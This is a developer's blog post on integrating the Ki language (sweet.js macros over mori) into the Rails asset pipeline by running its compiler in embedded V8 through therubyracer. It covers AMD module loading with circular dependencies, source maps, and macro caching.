Google Closure compiler has two main components:
- An SDK covering a lot of ground
- An optimizing/minifying JavaScript compiler
ClojureScript relies on the former to reimplement most of the Clojure standard library in JavaScript (while also using its module loading facilities), and on the latter to keep the compiler's output to reasonable sizes.
And by "reasonable size" I mean 330k minified, 80k minified+gzipped, with just a few libraries. Turns out `cljs.core` (imported by default) is huge. Like, over nine thousand lines in a single file huge.
In dev, it's not that bad. Sure, you have to go through a few hoops, like figuring out the right options to put in your `project.clj`, including some `goog/base.js` file on top of your `yourproject.js` file and having an inline JavaScript call to `goog.require`.
With all that figured out, it's really not that bad. Again, in dev.
Recompilations with `lein cljsbuild auto dev` are fast, around 200ms, it loads all dependencies correctly with XHR calls (about 20 separate .js files to do anything useful), everything's fine.
In production, it's another story entirely. First off, you want to set the Closure compiler to perform advanced optimizations. Basically it'll attempt to:
- Perform dead code elimination (remove the parts you don't need)
- Minify by renaming symbols (variables, functions) to shorter things like `Gl` or `aQ` instead of `reverse` or `forEach`
- And of course, removing all the whitespace it can get away with.
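As a toy illustration (made-up names, not actual Closure output), the renaming and whitespace steps turn readable code into something like:

```javascript
// Readable input:
function reverseWords(sentence) {
  return sentence.split(" ").reverse().join(" ");
}

// Roughly what the minifier emits: symbols renamed, whitespace stripped.
function aQ(b){return b.split(" ").reverse().join(" ")}

console.log(aQ("hello closure") === reverseWords("hello closure")); // true
```

Dead code elimination then drops whatever the renamed graph proves unreachable.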
So first off, it's slow. It's really really slow. If you have 9000+ lines of ClojureScript as input, you can imagine how much JavaScript it spits out. The Closure compiler has several megabytes of JavaScript to chew through, and it's not uncommon for it to take around 30 seconds to process completely.
Second, you have to be extra careful about foreign libraries. Because:
- Chances are, they don't use the google module system at all (`goog.require`, `goog.provide`, etc.)
- They define symbols that can not be renamed by the closure compiler in your code.
But there's a thing for that! Just add them to an `externs` list as an option to the compiler and you're good to go. Except, again, it's slow. Very slow. And it won't hesitate to emit thousands of warnings on sources over which you have absolutely no control.
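For reference, an externs file is just a list of declarations telling the compiler which names it must leave alone; a hypothetical one for a jQuery-like library might look like:

```javascript
// Hypothetical externs sketch: the bodies are empty, only the names matter.
// The compiler reads these and refrains from renaming jQuery/addClass
// in your code, so calls into the foreign library keep working.
var jQuery = function(selector) {};
jQuery.prototype.addClass = function(name) {};
jQuery.ajax = function(settings) {};
```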
And if that wasn't enough, once it's done taking dozens of seconds compiling all that stuff - sometimes it just emits erroneous code. I suspect that, when scanning a directory for source files, the tree it constructs is wrong, because if you run it in watch mode (so that it recompiles automatically on file changes) and touch just the right file (the one you'd pass to the compiler if it did allow that), then it takes another 8 to 10 seconds and generates correct code.
Oh, and if you want to modularize your codebase, say you want to output one .js file per "view type" of your application, say one for the issue tracker UI, one for the client-side slideshow visualizer, etc. - not only do you have to maintain a contrived directory infrastructure and specify tons of redundant dependencies in your `project.clj` - you also get the "30s to get the wrong code then 10s to get the right one but only if you launch it in watch mode" dance for every separate target file you want to have.
In that light, it appears that ClojureScript is - currently - quite painful to use in production. Sure, the tooling may improve in the coming months, but in a fast-moving world, I don't really have the time to wait.
Honestly, the ecosystem feels just wrong - even though I love reading Clojure code (the language itself is a pleasure), and even though it's full of nice people. Fetching .js files as a .pom + .jar from a Maven repository... it feels wrong, and so dissociated from the rest of the JavaScript world.
Mori + Sweet.js = Ki
When looking for alternatives, I knew that I wanted something:
- Lighter than ClojureScript
- With a similar syntax (S-exps are <3)
- With immutable data structures.
Ki is just that. It uses mori, which brings ClojureScript's data structures, and is, besides that, mostly a set of sweet.js macros to turn S-expressions back into good ol' JavaScript.
I won't detail the whole language, it has a reference page on the website.
The main differences from ClojureScript are missing features (at the time of this writing, destructuring assignment is the one I miss the most), and `snake_case` instead of `kebab-case`.
Of course, a bunch of macros (as sophisticated as they might get) will never do as much as a full compiler will - but in this case, it's kind of the point. A compiled ki program is usually pretty small, the only constant cost being mori, which is rather small (by cljs standards).
Ki presents itself as a JavaScript script; the command-line tool provided with the distribution is run with Node.js by default. After having played around with the language a bit, I was seduced. Moving on to the next problem: how the hell do I integrate that into my Rails application?
With ClojureScript, I had given up - even though Rails asset pipeline support for ClojureScript does exist, the documentation made it clear that it had to spin up a JVM each time any asset was modified. So I was just using the `lein cljsbuild auto` command by hand.
In Ki's case, though... I had a feeling we might do better. A lot better.
We could, obviously, hook into the Rails asset pipeline and, when a `.ki.js` file needs to be compiled, write it to a temporary file, then call the `ki` command-line tool on it, ask it to write to another temporary file, then read that file and return it to Rails.
But that's no fun at all! There's a reason tools like the Coffee compiler, sass compiler, ki compiler, have "watch" modes - they take longer to initialize than they do to recompile something. And we only need to pay that cost once.
So, let's go with a much harder - but more rewarding - alternative. Keeping our own instance of V8 around and running the ki compiler through that. A handy way to interact with v8 from Ruby is therubyracer. Ideally we'd use something runtime-agnostic like execjs - but we'll have enough trouble making our stuff work in a single JavaScript engine like that.
therubyracer is very nice to play with. The first thing we want to do is create a context.
```ruby
context = V8::Context.new
```
Then we can eval some JavaScript expressions in it:
```ruby
context.eval("2 + 2") # => 4
```
You can interact with JS expressions from Ruby; for example, JS arrays come back as `V8::C::Array` instances, which you can coerce to real ruby arrays, or just iterate with each.
```ruby
context.eval("[1, 2, 3]").to_a # => [1, 2, 3]
```
Similarly, you can iterate over JavaScript objects (ie. dictionaries/maps) with each if you want.
```ruby
context.eval("{a: 'apple', b: 'bananas'}").each do |key, val|
  puts "#{key} => #{val}"
end
# prints:
# a => apple
# b => bananas
```
The context retains globals across eval calls, so we can store whatever we want in `this` (the equivalent of `window` when there's no browser around.)

```ruby
context.eval("this.$modules = {}")
```
As always, though, globals are evil, if only because they might collide with other globals, so we'll use that sparingly.
We can load JavaScript files via eval using a little trick to escape the string properly:
```ruby
require 'multi_json'

source = File.read("foobar.js")
context.eval %Q{
  // preamble
  #{MultiJson.dump(source)}
  // epilogue
}
```
This approach has an advantage - you can fence the code with a preamble and epilogue of your choice. You can make your code execute within a scope where you override some variables, like `define` or `exports` for example.
If you don't need to do that, you can just tell V8 to load the file directly:
```ruby
context.load("foobar.js")
```
In this case, you don't control the scope the file is evaluated in (it's always the global scope) - but you do retain file / line number information within stack traces, which is invaluable.
So, now that we know how to evaluate arbitrary code within V8, and retrieve the results, and how to load any JS file in it, we're done right? We just load `ki.js`, call `ki.compile` and be on our merry way. Right? Riiiiiight?
JavaScript loaders
Wrong. You see, in the JS world (the real, vibrant, "god save us lest we forget a var" JS world, not the compiles-to-JS world), they've been busy figuring out the best way to have modular code that can be loaded in different environments (say, Node.js, or a browser module loader).
The idea is for libraries to avoid clobbering the global scope with stuff like `_`, or `$`, or `jQuery`, or `React`, or whatever variable they've chosen.
That's why it's not uncommon to see JS libraries nowadays structured like this:
```javascript
(function(root, factory) {
  if (typeof exports === 'object') {
    // Node.js-style require
    factory(exports, require('dep1'), require('dep2'));
  } else if (typeof define === 'function' && define.amd) {
    // AMD-style define
    define(['exports', 'dep1', 'dep2'], factory);
  } else {
    // Fuck-it style "let's pollute the global scope"
    // if you haven't included 'dep1.js' and 'dep2.js' before, this will break.
    var exports = {};
    factory(exports, Dep1, Dep2);
    root.mylib = exports;
  }
}(this, function (exports, dep1, dep2) {
  // we can access dep1 & dep2 here. mostly.
  exports.something = something;
  exports.somethingElse = somethingElse;
}));
```
In the case of `ki.js`, the main file for the ki compiler, the fuck-it style isn't included at all. Which means we can't get away with the naive gross approach of just loading everything in the right order, crossing our fingers, and sacrificing a virgin veal to the gods of globals.
The Node.js style is kind of painful to handle for us from the Ruby side. Whenever `require` is called, something must be done - but we load files not by XHR like some JS module loaders do, but by reading files from the filesystem ourselves (or calling `context.load`, or...). Point is - we need some way to get back to the Ruby side from that JS call.
I know that it's possible. In particular, commonjs.rb does it - but it doesn't solve problem #2 with this approach, which is that the ki compiler and its dependencies assume that, if it's loaded with the Node.js style, it can access Node.js modules such as "fs" (the async, libuv-based thingy to interact with the filesystem. so cute.) And since we're running in V8, not in node.js, we have zero access to that kind of module. We'll do the I/O ourselves, thank you very much.
Which leaves us with the AMD approach - the cleanest, in my view. I like the idea. Each module calls `define` with a list of dependencies, and a factory function that should be called with these dependencies.
It leaves us plenty of time to inspect those 'module specifications' from the Ruby side, load the dependencies and then pass them back to the factory function.
Now, at this stage of my journey I've lost a lot of time trying to do something sane.
I thought - well it's easy: we'll start by loading up `ki.js`, then see what its dependencies are, then load them up, see what their dependencies are and so forth until we have a complete dependency graph. Then we know in which order to call the factory functions.
It looked a little bit like this:
```
ki => exports sweet
sweet => exports underscore parser expander syntax text!./stxcase.js escodegen escope
underscore =>
parser => exports expander
expander => exports underscore parser syntax scopedEval patterns escodegen
syntax => exports underscore parser expander
escodegen => exports
escope => exports estraverse
scopedEval => exports
patterns => exports underscore parser expander syntax
estraverse => exports
```
Or, in graphviz form:
From this graph, though, it's immediately apparent that we have a serious problem.
Circular dependencies are lurking everywhere! `parser` depends on `expander`, but `expander` depends on `parser` as well. And many others.
So, my beautiful plan of loading everything in order has quickly fallen apart. Instead, we can do the next best thing: load them in the order they are required, and when something's not properly loaded yet, reserve an empty-object space in our modules list that we'll pass to the dependants. I suspect that's how most AMD loaders work, because this approach actually worked.
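The empty-object reservation can be sketched like this (hypothetical, boiled down to the bare trick):

```javascript
// Hand out a (still empty) exports object early; by the time a dependant
// actually calls into it, the other module's factory has filled it in.
const modules = {};

function exportsFor(name) {
  return (modules[name] = modules[name] || {});
}

// a and b depend on each other - a cycle.
const a = exportsFor("a");
const bForA = exportsFor("b"); // empty placeholder for now
a.ping = function () { return "a.ping -> " + bForA.pong(); };

const b = exportsFor("b"); // the very same object as bForA
b.pong = function () { return "b.pong"; };

// The placeholder was mutated in place, so the late binding works out.
console.log(a.ping()); // a.ping -> b.pong
```

It only breaks if a module calls into its cyclic dependency *during* its factory, before the placeholder is filled - which these modules happen not to do.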
In the case of ki-rails, I've decided to store modules in a global object, so that I can easily access them later. At the time of this writing, the code isn't entirely cleaned up, so don't hit me with a large trout - just be patient.
There are a few things I haven't mentioned yet, but they need to be taken care of:
- First off, `exports` is a special requirement. It's not a js file we load, it's the object in which all the exported symbols of a library will be stored. That must be accounted for.
- Second, my dependency graph only shows sanitized module names. In the real world, it's not uncommon to see modules require `./module` or `module.js` instead of just `module`.
- Thirdly, AMD loaders allow two different define signatures - one that goes: name, dependencies, factory, and an anonymous one. Most modules I've encountered use the latter, but named modules exist (within the sweet.js codebase) and must be handled correctly.
- Lastly, dependencies starting with `text!` are not JavaScript files and must be passed as a string, without any evaluation, to the module asking for them.
With all that, we can finally call our ki compiler from V8, a naive version of which looks something like:
```ruby
# sweet.js macros for ki (actually implement the language)
ki_core = File.read("ki.sjs")

# our ki.js code that we want to compile.
source = File.read("somefile.ki.js")

ret = context.eval %Q{
  var ki = __modules.ki;
  var options = {};
  options.ki_core = #{MultiJson.dump(ki_core)};
  var source = #{MultiJson.dump(source)};
  ki.compile(source, options);
}
ret[:code] # => our compiled JavaScript code!
```
However, this approach is pretty naive:
- It parses the ki core macros every time
- It has no source map support
Source map support
Thankfully, Sweet.js has source map support built-in. And the ki compiler interface allows its usage, like so:
```javascript
options = {
  source: source,
  ki_core: ki_core,
  sourceMap: true,
  filemap: "path/to/yourfile.js.ki",
  mapfile: "path/to/yourfile.map"
}
ret = ki.compile(source, options);
ret.sourceMap // => the sourceMap content
ret.code      // => the compiled JavaScript code, including the sourceMappingURL comment.
```
To hook that into ki-rails, I took inspiration from Mark Bates' coffee-rails-source-maps. Basically, the original ki file along with its source map are written into `public/assets/source_maps` and the correct URL is specified in `sourceMappingURL`, in the compiled JavaScript file.
Apart from erroring in production because the server was very protective about where the web app could and could not write, it worked very nicely!
Macro support and speed
I said one of the problems with our approach was that the ki macros were being parsed every time. This is actually pretty slow. At the time of this writing, they only amount to about 900 lines of rules, but the sweet.js parser is quite an involved piece of work, and as such, I was seeing end-to-end compilation times of about a second or two.
We can avoid that by precompiling `ki_core` and keeping it around in the global context.
```ruby
context.eval %Q{
  this.__macros = sweet.loadModule(#{MultiJson.dump(ki_core)});
}
```
And then, later, passing it as the `modules` option to the ki compiler instead of passing the `ki_core` option.
This has a negative side-effect, however. See, the ki compiler has a piece of code like this:
```javascript
if (!options.modules && options.ki_core) {
  var module = joinModule(src, options.ki_core, options.rules);
  options.modules = sweet.loadModule(module);
}
```
ie. when passed the source of the ki macros instead of pre-compiled modules, it calls `joinModule` on the input (ie. src) and the ki macros, then asks sweet to load that. What does `joinModule` do exactly?
```javascript
var joinModule = function(src, ki_core, additionalRules) {
  rules = additionalRules || [];
  rules.push(parseMacros(src));
  return ki_core.replace('/*__macros__*/', rules.join('\n'));
}
```
How interesting! A `parseMacros` method. That's where I saw that my little trick didn't quite work. Sure, it made compilations faster, but it broke ki macro support.
To understand why, we have to learn a bit more about how ki macros work and how ki is implemented. Ki is implemented, as previously mentioned, via a set of sweet.js macros. They look like this.
```javascript
macro _arr {
  rule { () } => {
  }
  rule { ($arg) } => {
    _sexpr $arg
  }
  rule { ($arg $args ...) } => {
    _sexpr $arg, _arr ($args ...)
  }
}
```
The largest macro, by far, is `_sexpr`. It contains rules like:
```javascript
rule { (fn [$args ...] $sexprs ...) } => {
  function ($args(,)...) {
    _return_sexprs ($sexprs ...)
  }
}
```
That's the anonymous function definition syntax! Sweet.js is definitely readable. Here's an example of a ki macro in action:
```javascript
ki macro (thunk $body ...)
         (fn [] $body ...)

ki (thunk (alert "Whoops!"));
```
The `parseMacros` call we've seen earlier in the ki compiler looks for the "ki macro" string with a regular expression, then converts the definitions to sweet.js rules, like so:
```javascript
var rules = macros.map(function(macro) {
  return 'rule { ' + macro[0] + ' } => { _sexpr ' + macro[1] + ' }'
});
```
That leaves us with this mysterious line in joinModule:
```javascript
return ki_core.replace('/*__macros__*/', rules.join('\n'));
```
Apparently it's replacing a comment within the ki core macros' source with the user's macro definitions. Why is it doing that? Let's see where it gets inserted:
```javascript
macro _sexpr {
  rule { () } => {
  }
  /*__macros__*/
  /* ... rest of the _sexpr macro */
}
```
Of course! It's smack dab in the middle of the `_sexpr` macro, so that we may use ki user-defined macros anywhere in an S-expression.
However, it's bad news for our Asset pipeline integration dreams. Does this mean that if we want to support user-defined ki macros, we'll have to recompile the whole thing every time, and thus have a minimum of 1-2s compilation time?
Sprockets dependencies
Not so fast! First off, ki has no concept of `import` or `require` or `include`. It allows one to define namespaces, but there's no built-in support for importing other files, unlike, for example, sass. (Not a language that compiles to JS, but it is well-supported by rails and has its own @import statement).
So, we have to fall back to the next best thing: Sprockets directives. Sprockets is the little processing meta-engine that could, powering the whole Rails asset pipeline, from preprocessing to transforming to postprocessing to fingerprinting, manifest-generating, caching, and serving-with-the-right-headers.
As anyone who has written JavaScript or CoffeeScript in Rails knows, Sprockets has directives, the most used of which are `require`, `require_tree` and `require_self`:
```javascript
//= require preamble
//= require_self
//= require_tree ./components

console.log("This will be between preamble and all things in ./components");
```
Now, since we want to write modular ki code, we want to be able to require stuff.
In the case of functions, the ki compiler doesn't have to know about it. They're just regular JavaScript functions, it's not like any compilation-time checking is done.
In the case of macros, however, the ki compiler has to know about every macro definition in the dependencies of our file, so that it may apply the right transformations.
In other words, we need to do the following (in pseudo code):
```
when compiling a ki file within Rails:
  - figure out all the files it requires
  - read them all
  - concatenate them in a single string
  - extract only the macro definition parts
  - load them with sweet.js
  - pass them to the ki compiler.
```
Now, the Sprockets API is not that hard to figure out, although I wish better documentation existed on the subject. Turns out, from within a tilt template called by Sprockets, like this one:
```ruby
class KiTemplate < Tilt::Template
  def prepare
    # must be defined
  end

  def evaluate(scope, locals, &block)
    # here's the magic
    compile(data)
  end
end
```
..we can access the set of dependencies with a simple `scope._dependency_assets`, and we can even coerce it to an array with a `.to_a` call. Giving us something like:
```ruby
["/Users/amos/Dev/memoways/memowaysv2/app/assets/javascripts/experiments.js.ki",
 "/Users/amos/Dev/memoways/memowaysv2/app/assets/javascripts/experiments/console-log.js.ki",
 "/Users/amos/Dev/memoways/memowaysv2/app/assets/javascripts/experiments/macro-usage.js.ki",
 "/Users/amos/Dev/memoways/memowaysv2/app/assets/javascripts/experiments/macro.js.ki",
 "/Users/amos/Dev/memoways/memowaysv2/app/assets/javascripts/experiments/take-range.js.ki"]
```
Reading all those files and concatenating them is done in two lines of Ruby. Extracting the macro part can be done by calling the JS method `ki.parseMacros` via our V8 context, and all that's left is to call `sweet.loadModule` and pass the result to the ki compiler.
Of course, that only solves the problem of "if A requires B, A should be able to use macros defined in B". It doesn't solve the problem of "I want compilations to be fast because brain switches are expensive".
However, we can easily solve that with a simple cache. I've opted for a very naive solution for the time being: I simply have a global object `__macrocache` in the V8 environment that stores compiled macros, indexed by the SHA-1 hash of their sources.
Often, I'll change the ki code without touching any macro definition. In that case, the SHA-1 of the macro sources stays the same, and no reloading of the sweet.js module happens. In that case, recompilation time is not even noticeable!
If you liked this article, please support my work on Patreon! | https://fasterthanli.me/articles/sexps-in-your-browser | CC-MAIN-2021-25 | refinedweb | 5,534 | 64.3 |
Hi, I'm currently studying for my final test in a Java beginner class, and there is a problem I couldn't solve until now. I'm a total beginner and have searched for a solution for almost two days :(

The program takes a variable n from another text file; this n is then used as the amount of randomized data. After we get the random array we need to sort and reverse it. So far I could make the sort work, but not the reverse. Please, somebody, suggest what I should do to output the int array in reverse/descending order.
```java
import java.io.FileInputStream;
import java.util.*;

public class SortReserve {
    public static void main(String[] args) throws Exception {
        Scanner input = new Scanner(System.in);
        Random rnd = new Random();
        Scanner fs;
        int deret;
        String filename;
        int n;

        System.out.print("Nama File : ");
        filename = input.nextLine();
        try {
            fs = new Scanner(new FileInputStream(filename));
            while (fs.hasNext()) {
                n = fs.nextInt();
                System.out.printf("\n N : %d%n\n", n);
                int[] menaik = new int[n];
                for (int i = 0; i < menaik.length; i++) {
                    menaik[i] = (rnd.nextInt(100) + 1);
                    Arrays.sort(menaik);
                    System.out.println("Menaik\n");
                    System.out.printf("%5d ", menaik[i]);
                }
                System.out.println("\n");
            }
            fs.close();
        } catch (java.io.FileNotFoundException e) {
            System.err.println("Can't make the file " + filename);
            System.exit(-1);
        } catch (SecurityException e) {
            System.err.println("Accses denied");
            System.exit(-1);
        }
    }
}
```
I've tried using a comparator and just found out it only works for String/object arrays; I've searched how to convert an int array to a String array but that didn't work out. Any help and solutions really appreciated :)
NB: you need a text file containing a number when running this program
Walk-through — install Kubernetes to your Raspberry Pi in 15 minutes
Here’s something you can do before work, with your morning coffee, or whilst waiting for dinner to cook of an evening. And there’s never been a better time to install Kubernetes to a Raspberry Pi, with the price-drop on the 2GB model — perfect for containers.
I’ll show you how to install Kubernetes to your Raspberry Pi in 15 minutes including monitoring and how to deploy containers.
The bill of materials
I’ll keep this quite simple.
- Raspberry Pi 4, with 2GB or 4GB RAM — the 2GB is the best value, 4GB is best if you don’t plan on doing clustering.
- SD card — 32GB recommended, larger is up to you, but Kubernetes writes to disk a lot and could kill a card, so I tend to prefer buying more smaller cards.
- Power supply — you need the official supply, I know it’s expensive, but that’s for a reason. Don’t be cheap because you’ll buy twice.
If you’d like some links, you can find them in my home-lab post: Kubernetes Homelab with Raspberry Pi and k3sup.
Flash the initial OS
There are so many ways to install an Operating System, but I recommend Raspbian and the Lite edition which ships without a UI.
Once you download the image, you can use Etcher.io from our friends at Balena to flash it without even unzipping it. How cool is that?
Before you boot up that RPi, make sure you create a file named `ssh` in the boot partition. If on a Mac you'll see that gets mounted for you as soon as you eject and re-insert the SD card.
Connect for the first boot
Now connect to the Raspberry Pi over your local network. It will show up as `raspberrypi.local`, but if you can't connect for some reason, then install `nmap` and run `nmap -sP 192.168.0.0/24` to run a network scan.
- Change the password with `passwd pi`.
- Run `raspi-config` and change the memory split to `16mb`, so that we have all the RAM for Kubernetes, believe me, it needs it.
Get your CLI tools
Now on your laptop you’ll want a few tools. We don’t need to log into the RPi again, we’ll use it as a server, remotely.
- Install kubectl — the Kubernetes CLI
- Install k3sup — the Kubernetes (k3s) installer that uses SSH to bootstrap Kubernetes
```sh
curl -ssL | sudo sh
```
`k3sup install` can be used to install k3s as a server, to begin a new single-node cluster (that's what we'll do today). If you have multiple nodes, then the `k3sup join` command lets you add in additional agents or workers to expand the capacity.
- Install arkade, to get Kubernetes apps the easy way
```sh
curl -sSL | sudo sh
```
arkade installs apps, the easy way, using their upstream helm charts, but hiding away the gory and boring details.
Install Kubernetes with k3sup and k3s
k3s is a lightweight edition of Kubernetes made by Rancher Labs, it’s suitable for production, but also perfect for small devices like our Raspberry Pi. Its memory requirements are around 500MB for a server vs. around 2GB for kubeadm (upstream Kubernetes)
```sh
export IP="192.168.0.1" # find from ifconfig on RPi

k3sup install --ip $IP --user pi
```
In a few moments you’ll receive a kubeconfig file into your local directory, with an instruction on how to use it.
Find the node, and check if it’s ready yet
```sh
export KUBECONFIG=`pwd`/kubeconfig
kubectl get node -o wide
```
You can add `-w` to most kubectl commands to "watch" or "stream" the output status, so you can save on typing.
By default k3s comes with the metrics-server, which is used for Pod autoscaling and getting memory/CPU for pods and nodes:
```sh
kubectl top node
kubectl top pod --all-namespaces
```
Now let’s install one or two apps, run
arkade install to see what's available, but not that not all projects in the CNCF landscape work on ARM devices
```sh
arkade install --help

Available Commands:
  cert-manager             Install cert-manager
  chart                    Install the specified helm chart
  cron-connector           Install cron-connector for OpenFaaS
  crossplane               Install Crossplane
  docker-registry          Install a Docker registry
  docker-registry-ingress  Install registry ingress with TLS
  info                     Find info about a Kubernetes app
  inlets-operator          Install inlets-operator
  istio                    Install istio
  kafka-connector          Install kafka-connector for OpenFaaS
  kubernetes-dashboard     Install kubernetes-dashboard
  linkerd                  Install linkerd
  metrics-server           Install metrics-server
  minio                    Install minio
  mongodb                  Install mongodb
  nginx-ingress            Install nginx-ingress
  openfaas                 Install openfaas
  openfaas-ingress         Install openfaas ingress with TLS
  postgresql               Install postgresql
```
Let’s try the Kubernetes dashboard?
```sh
arkade install kubernetes-dashboard
```
The installation script prints out how to use the app, and `arkade info` can show us the same information later too.
```sh
# To forward the dashboard to your local machine
kubectl proxy

# To get your Token for logging in
kubectl -n kubernetes-dashboard describe secret $(kubectl -n kubernetes-dashboard get secret | grep admin-user-token | awk '{print $1}')

# Once Proxying you can navigate to the below
```
Paste in your token
Now enjoy the dashboard:
Let’s install another popular application, openfaas. OpenFaaS gives us a simple way to deploy functions and microservices to Kubernetes with built-in auto-scaling.
```sh
arkade install openfaas
```
Here’s the post-install information:
```sh
# Get the faas-cli
curl -SLsf | sudo sh

# If basic auth is enabled, you can now log into your gateway:
PASSWORD=$(kubectl get secret -n openfaas basic-auth -o jsonpath="{.data.basic-auth-password}" | base64 --decode; echo)
```
The IP of my RPi is 192.168.0.201, so I can access OpenFaaS using a NodePort of 31112.
```sh
export OPENFAAS_URL=http://192.168.0.201:31112

echo -n $PASSWORD | faas-cli login --username admin --password-stdin

faas-cli store list --platform armhf
faas-cli store deploy figlet --platform armhf
faas-cli list
```
Now open the OpenFaaS UI and check your figlet function using or the equivalent.
You can also build your own functions with Python, Go, JavaScript and many other languages.
If you have a Docker Hub login, then you can try the following, but you'll need to run it on a separate Raspberry Pi, with `docker` installed (`curl -sSL | sudo sh`)
```sh
export USERNAME=alexellis2
docker login -u $USERNAME

faas-cli template store pull golang-http
faas-cli new --lang golang-http --prefix=$USERNAME my-api

faas-cli up -f my-api.yml

# Now invoke your function
faas-cli invoke my-api -f my-api.yml
```
You can also edit the function's code and then run `faas-cli up` again:
Contents of `my-api/handler.go`:
```go
package function

import (
	"net/http"

	"github.com/openfaas-incubator/go-function-sdk"
)

func Handle(req handler.Request) (handler.Response, error) {
	return handler.Response{
		Body:       []byte(`Run k3s on your RPi!`),
		StatusCode: http.StatusOK,
	}, nil
}
```
Find out more about OpenFaaS at openfaas.com
You can also see your functions on the Kubernetes Dashboard:
Get a public IP for your cluster
You can get a public IP for your cluster via a tunnel using the popular Open Source project inlets.
Find out how in this tutorial — which combines cert-manager, nginx-ingress (or Traefik) and the inlets-operator.
Wrapping up and next steps
If you want to take things further, you can start adding additional nodes into the cluster, to extend its capacity and to give redundancy.
- Kubernetes Homelab with Raspberry Pi and k3sup
- arkade by example — Kubernetes apps, the easy way (tutorial primarily for PC/cloud)
- Star/fork k3sup on GitHub ⭐️
- Star/fork arkade on GitHub ⭐️
You can connect with the OpenFaaS community — to talk about Kubernetes, ARM, Raspberry Pi clusters and serverless. Join our Slack workspace today. | https://medium.com/@alexellisuk/walk-through-install-kubernetes-to-your-raspberry-pi-in-15-minutes-84a8492dc95a | CC-MAIN-2020-16 | refinedweb | 1,276 | 57.61 |
NAME
access - check user’s permissions for a file
SYNOPSIS
#include <unistd.h>

int access(const char *pathname, int mode);

DESCRIPTION

The check is done using the calling process’s real UID and GID, rather than with the effective IDs as is done when actually attempting an operation. This is to allow set-user-ID programs to easily determine the invoking user.
ERRORS
access() shall fail if:

EACCES The requested access would be denied to the file or search permission is denied for one of the directories in the path prefix of pathname. (See also path_resolution(2).)

ELOOP Too many symbolic links were encountered in resolving pathname.

EROFS Write permission was requested for a file on a read-only filesystem.
RESTRICTIONS
access() returns an error if any of the access types in the requested call fails, even if other types might be successful. access() may not work correctly on NFS file systems with UID mapping enabled, because UID mapping is done on the server and hidden from the client, which checks permissions., 4.3BSD
SEE ALSO
chmod(2), chown(2), open(2), path_resolution(2), setgid(2), setuid(2), stat(2) | http://manpages.ubuntu.com/manpages/dapper/man2/access.2.html | CC-MAIN-2015-35 | refinedweb | 181 | 54.73 |
Ticket #4960 (closed Bugs: fixed)
boost::pool_allocator for vector of vectors exhausts memory
Description
glr9940 reported in #386 that using boost::pool_allocator for a vector of vectors caused problems. I have now found a slight extension to the example glr9940 reported which does not crash, but exhausts memory even for a tiny vector of vectors.
I have used the development trunk code and gcc 4.1.2.
#include <boost/pool/pool_alloc.hpp> #include <vector> #include <iostream> typedef std::vector<int, boost::pool_allocator<int> > EventVector; typedef std::vector<EventVector> IndexVector; int main() { IndexVector iv; int limit = 100; for (int i = 0; i < limit; ++i) iv.push_back(EventVector()); std::cout << "it works\n"; return 0; }
I suspect that the critical value for 'limit' depends on the machine. On my machine a limit of 20 seems to work fine, a limit of 24 uses a few Gb of memory, while a limit of 30 stalls the process, 'top' showing that the memory footprint doubles rapidly until memory is exhausted. I've noticed for other examples of this issue that when I replace the vector push_back loop with a rolled out version just creating a number of pooled vectors, it works fine.
Have I made some noob mistake, or is this a bug?
Attachments
Change History
Changed 5 years ago by steven_watanabe
- attachment singleton_pool.hpp.patch
added
Patch adding instrumentation to singleton_pool
Changed 5 years ago by mattiasg
- attachment poolalloctest2_rhel5
added
Output of the modified test program with the patched singleton_pool.hpp
comment:2 Changed 5 years ago by mattiasg
On a Suse 11 machine with gcc 4.3.4 I cannot reproduce the problem, but on a RHEL5 machine with gcc 4.1.2 a run with your patched singleton_pool.hpp produces the output which I've attached to this issue. To avoid crashing the server I ran the test on I had to abort the program around the time it used half (~16Gb) of the available memory.
comment:3 Changed 5 years ago by steven_watanabe
Sorry for the delay. The file you attached is an executable. I don't think it's the output.
Changed 5 years ago by mattiasg
- attachment rhel5_out2
added
Proper output file
comment:6 Changed 5 years ago by johnmaddock
I can reproduce this with gcc-4.0.4 as well. Strange bug!
comment:7 Changed 5 years ago by johnmaddock
Update:
This is a result of two bugs:
1) std::vector invokes undefined behaviour by calling Allocator::allocate(0). This has been fixed in more recent GCC versions. 2) Boost.Pool, when it tries to allocate 0 chunks thinks allocation has failed (a bug), so allocates a whole new block, *and* ups the size of the next block to allocate by a factor of 2. So just a few allocation requests for 0 chunks blows up the heap.
This will be fixed in the sandbox version of Boost.Pool soon.
I can't reproduce the problem with gcc 4.4.1, or with MSVC 10. I'd guess that it has something to do with the standard library implementation of vector, though.
Can you try applying the patch to singleton_pool which I'm about to attach, run the following variation and save the output? It should produce code that you can compile which demonstrates the problem. Check that it actually triggers the problem, and attach it. | https://svn.boost.org/trac/boost/ticket/4960 | CC-MAIN-2016-22 | refinedweb | 559 | 63.19 |
When we are talking about how to start python we must understand the basic tools that will help you in writing better code debugging and dependency management.
How to start python projects.
To start any project it is always recommended to create the project in its own environment. This means that anything that is installed for python at the global level will not affect this env and vice versa.
VirutalENV:
Install virtualenv
sudo apt-get install virtualenv
After installation activate it.
virtualenv env_name -m python3
This will create an env for python 3 and you can start working inside it. Keep in mind that you have to activate the env before running your code to make it work.
Activate env:
sourve env_name/bin/activate
Now you can install any packages that you want to use in your python program.
Deactivate env:
deactivate
Pep8 formatting.
Pep8 is the formatting style that defines how you should format your python program. How you should name your variables and more such conventions. Pep8 is highly recommended for anyone who wants to work with the opensource community.
Dependency Management
For dependency management in python, we use pip. It is used for installing packages. You can have a file naming requirements.txt which will have all the packages that you need to install along with the version that you want to install.
HOW TO INSTALL PYTHON PACKAGE:
pip install package_name
HOW TO INSTALL USING REQUIREMENTS.TXT
pip install -r requirements.txt
Debugger
Well according to me python debugger is best for anyone who is starting. Now how to use it is as below.
Where ever you want to stop the execution of code and see the values or variables or execute whatever you want. You can use the below lines.
import pdb pdb.set_trace()
This will stop the execution of the program and give you control of the program.
Editor?
Pycharm is very good for python but if you are a power user of sublime that will be awesome.
Read more about python below
If you like the article please share and subscribe. You can also join our Facebook group: and Linkedin group: | https://www.learnsteps.com/how-to-start-python-basic-tooling-in-python/ | CC-MAIN-2020-50 | refinedweb | 357 | 66.74 |
TheThe input file contains one or more grids. Each grid begins with a line containing m and n, the number of rows and columns in the grid, separated by a single space. If m = 0 it signals the end of the input; otherwise 1 <= m <= 100 and 1 <= n <= 100. Following this are m lines of n characters each (not counting the end-of-line characters). Each character corresponds to one plot, and is either `*', representing the absence of oil, or `@', representing an oil pocket.
OutputForSample Output
0 1 2 2
这是一道dfs的简单题有利于初学者认识dfs
代码如下:
